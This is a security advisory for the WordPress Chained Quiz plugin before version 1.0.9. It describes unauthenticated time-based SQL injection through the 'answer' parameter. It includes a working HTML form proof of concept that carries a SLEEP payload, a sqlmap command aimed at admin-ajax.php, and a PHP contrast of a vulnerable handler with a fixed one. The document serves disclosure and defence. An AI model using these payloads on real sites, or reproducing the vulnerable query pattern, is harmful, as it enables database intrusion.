WordPress plugin Chained Quiz before 1.0.9 allows remote unauthenticated users to execute arbitrary SQL commands via the "answer" and "answers" parameters. Technical details: Chained Quiz appears to be vulnerable to time-based SQL injection. The issue lies in the "$answer" backend variable. Privileges required: None
The following exploit will cause the SQL query to execute and sleep for 10 seconds:
<html>
<body>
<form action="http://target/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="answer" value="8 AND SLEEP(10)" />
<input type="hidden" name="question_id" value="194" />
<input type="hidden" name="quiz_id" value="581" />
<input type="hidden" name="post_id" value="3199" />
<input type="hidden" name="question_type" value="radio" />
<input type="hidden" name="points" value="0" />
<input type="hidden" name="action" value="chainedquiz_ajax" />
<input type="hidden" name="chainedquiz_action" value="answer" />
<input type="hidden" name="total_questions" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Using sqlmap:
sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="answer=1*&question_id=1&quiz_id=1&post_id=5&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1" --dbms=MySQL --technique T
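As an added illustration of the root cause and its fix (hypothetical code written for this note, not the plugin's own source; the table and column names are assumptions): the vulnerable handler interpolates the POSTed "answer" value straight into the query, while the hardened handler coerces it to an integer and binds it with $wpdb->prepare().

```php
<?php
// Hypothetical WordPress AJAX handler showing the class of bug described
// above. Table and column names are assumptions, not the plugin's schema.

// VULNERABLE: the POSTed "answer" value is concatenated into SQL, so a
// payload such as "8 AND SLEEP(10)" is evaluated by MySQL.
function chainedquiz_answer_vulnerable() {
    global $wpdb;
    $answer      = $_POST['answer'];
    $question_id = $_POST['question_id'];
    $table       = $wpdb->prefix . 'chained_answers';
    $sql = "SELECT points FROM $table WHERE id = $answer AND qid = $question_id";
    $row = $wpdb->get_row( $sql );
    wp_send_json( $row );
}

// HARDENED: values are reduced to non-negative integers with absint() and
// bound as %d placeholders via $wpdb->prepare(), so input can only supply
// a number and can never alter the query structure.
function chainedquiz_answer_hardened() {
    global $wpdb;
    $answer      = isset( $_POST['answer'] ) ? absint( $_POST['answer'] ) : 0;
    $question_id = isset( $_POST['question_id'] ) ? absint( $_POST['question_id'] ) : 0;
    if ( 0 === $answer || 0 === $question_id ) {
        // Reject anything that is not a valid positive identifier.
        wp_send_json_error( 'invalid parameters', 400 );
    }
    $table = $wpdb->prefix . 'chained_answers';
    $row   = $wpdb->get_row(
        $wpdb->prepare(
            "SELECT points FROM {$table} WHERE id = %d AND qid = %d",
            $answer,
            $question_id
        )
    );
    wp_send_json_success( $row );
}
```

Because the action is reachable through admin-ajax.php without authentication, this parameter validation is the only control between an anonymous request and the database query.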